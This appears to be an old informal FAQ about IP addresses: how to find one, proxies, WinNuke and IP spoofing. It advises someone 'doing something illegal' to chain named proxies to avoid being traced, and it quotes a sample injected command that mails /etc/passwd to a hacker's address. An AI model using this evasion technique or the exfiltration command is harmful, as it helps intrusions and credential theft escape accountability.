IP Addresses – An FYI


 

 

Introduction

What is an IP address?

How do I find out what my IP address is?

How do I find out someone else’s IP address?

How can I hide my IP address?

Proxy Servers

IRC and Winnuke

What is this IP Spoofing lark all about?

 

Introduction

I often see messages posted in News Groups asking, "How do I hide my IP address?" so here it is: A For Your Information on IP addresses.

  

What is an IP address?

Before I can answer that question first you must understand how computers communicate across the Internet. They do this using something called the TCP/IP protocol suite. A protocol is a defined set of rules that computers must adhere to if communic ation is to take place. It’s like a spoken language. Two people speaking English can communicate with no problems. If someone else comes and joins the conversation and starts speaking in Swahili or Spanish they won’t be understood and more than likely ign ored.

 

Communications over a computer network use protocols and the TCP/IP protocol suite describes a large number of these protocols and how they interoperate. Another thing that can be said about communications over a network and that is they are modular. W hoa!

 So what does modular mean? When something is done in a modular fashion it means there are a number of different layers to the whole process; that is, it is made up of modules. As an example to describe this concept imagine three people cooking a meal.

John has the job of peeling the potatoes. Once he has done this he passes the potatoes to Sue. This is his job done. Sue puts the potatoes in boiling water and boils them for 15 minutes. Once they are cooked she passes them to Dave. Sue’s job is now do ne. Dave then mashes the potatoes and then serves them up. Each of these three people has their own specific task and each of them rely on the other one to do their job properly. Otherwise everyone goes hungry.

 So it is with network communications. At the bottom end you have the Network Access layer (John’s job.) This is where your hardware comes into play. In other words your modem and serial port (or Network Interface Card) and cables. Their job is to send the electrical impulses down the line and to receive them. They also do a couple of other things like basic error checking but don’t work about that for now. When this layer receives some information from another computer it does it error checking a nd stuff then passes the information onto the next layer. This ‘next’ layer is called the Internet layer. This is the layer that we are interested in. The IP part of TCP/IP stands for Internet Protocol and it operates at this layer. (Sue’s job.) Every com puter attached to the Net has an IP address that uniquely identifies that machine meaning that no two machines on the Net have the same IP address.(!) If there were two machines that had the same address communications would get scrambled.

 An IP address is 32 bits in length. These 32 bits are split up into 4 8-bit sections and so an IP address will look like this: 145.63.69.129

 

(I’m not going to go into different classes of address and subnets here; I’ll maybe write something about them later, in a different FYI)

 

When you want to ‘talk’ to another computer across the Internet you send all communication packages to that computer’s IP address. When it replies to you it sends its reply to your IP address. It’s like you ringing up your friend ( their phone number r epresenting an IP address) asking him a question and then hanging up. He then phones you back and gives you the reply then hangs up. This kind of communication is called connectionless.

 

So an IP address is a string of four numbers that uniquely identifies your computer on the Internet. Your IP address is assigned to you by your Internet Service Provider. You may have what is known as a static IP address. This is one where it never cha nges. Your machine will always have that IP address. More often than not though, you’ll be assigned a dynamic one. This means that every time you connect to the Internet your ISP temporarily leases you an IP address. For the duration of that session your computer will use that IP address. It will change every time you connect to your ISP.

 

How do I find out what my IP address is?

 

This depends on what operating system you use :

 

Windows 95 – Run winipcfg.exe whilst you are connected to the Internet.

Windows NT – Run ipconfig /all from a command prompt.

Unixes - Run netstat with no options.

 

How do I find out someone else’s IP address?

 

There are a number of ways of doing this depending on ‘whose’ address your trying to find. When using the Transmission Control Protocol another machine, when it is communicating with yours, makes a virtual connection (remember TCP is connection ori entated).

If you run netstat –n from a DOS or Command prompt it will give a listing of all the IP addresses of the machines currently connected to yours.

 

If a machine has a domain name, that is a name like www.microsoft.com or bloodstone.globalnet.co.uk, you can ping it. From a DOS or Command Prompt type

 

Ping domain.name

 

This will get a response like :

 

C:\>ping server.company.com

 

Pinging server.company.com [123.123.123.123] with 32 bytes of data:

 

Reply from 123.123.123.123: bytes=32 time=10ms TTL=128

Reply from 123.123.123.123: bytes=32 time<10ms TTL=128

Reply from 123.123.123.123: bytes=32 time<10ms TTL=128

Reply from 123.123.123.123: bytes=32 time<10ms TTL=128

 

You can also use the nslookup utility in NT or Unix.

 

Another way of finding out someone’s IP address is looking at the headers on e-mails.

This will provide the source IP address, that is the IP address of the machine that the e-mail originated from. It is better if the e-mail is a recent one though because some people’s addresses are assigned dynamically and change from session to sessio n.

 There are other ways, such as checking server log files, but most of you will not be able to do this unless you have access to those files.

 

How can I hide my IP address?

 

The only way to hide your IP address from your target machine is with the use of a Proxy Server.

Proxy Servers

A Proxy server is a server that carries out a request for you and gives you the results back. It sort of acts as a middle man. This will hide your IP address from the destination machine, but note, it won’t hide your address from the proxy server. The IP address of the proxy server will be logged on the target machine instead of yours. If you are doing something illegal remember your victim will find out that the IP address that was used to attack came from a proxy server and he will get the admin of the proxy server to look through the log files. This is where chaining comes in handy. You can string a number of proxies together so it makes the task more difficult of tracking you down. This leads to the question, "How do I string several proxies to gether?". Lets look at a web browser as an example. In the address field you enter the following.

 

http://proxy1:port/http://proxy2:port/http://www.victim.com/

 

for example :

 

http://192.31.174.2:80/http://proxy.magusnet.com/-_-http://www.microsoft.com

 

 

Note – after the magusnet proxy you have to put /-_-http://

 

Some proxies won’t allow you to put them in the address field like this so configure your browser to use this kind of proxy and then you’ll be going through three. proxy1.emirates.net.ae is one such publicly accessible proxy that does this…configure yo ur browser to use it on TCP port 8080.

 

You can also link to an FTP site via HTTP proxies like this :

 

http://proxy1:port/http://proxy2:port/ftp://victim.com

 

but for a more interactive ftp session from a command line ftp utility (like the one that comes with Windows 95 or NT) ftp to www.knih-st.cz .

 

IRC and Winnuke

Most people that post messages asking, "How do I hide my IP address" have been the victims of being ‘nuked’ whilst using IRC. Winnuke is one such program that is used by lamers to crash others’ computers. What actually happens here is three

Out-of-band messages are sent to the victim’s TCP port 139. This then causes the PC to blue-screen. A patch for this bug is available from Microsoft :

 This affects Windows 95 and NT computers. (Please don’t ask me where to get Winnuke from coz I won’t tell you. It’s not too difficult to get a hold of anyway.)

 Many people ask me about, "IP spoofing and can I use it to hide my IP address?" The answer is no. Read on.

 

What is this IP Spoofing lark all about?

 

IP spoofing is where an attacker can predict the TCP sequence number of a trusted TCP session between two other machines and hijacks the session by modifying his IP address and injecting a single arbitary command. Eg "cat /etc/passwd | mail hacker@here.org". Now this is extremely advanced stuff and if you are reading this FYI, you probably won’t know what I am talking about. I only include this here to let you know you can’t use IP spoofing t o hide your IP address the way you want to.

 

 Well that's it. I hope you have found this useful and informative. If you have any queries, or would like to correct me, or add to this FYI please mail me at mnemonix@globalnet.co.uk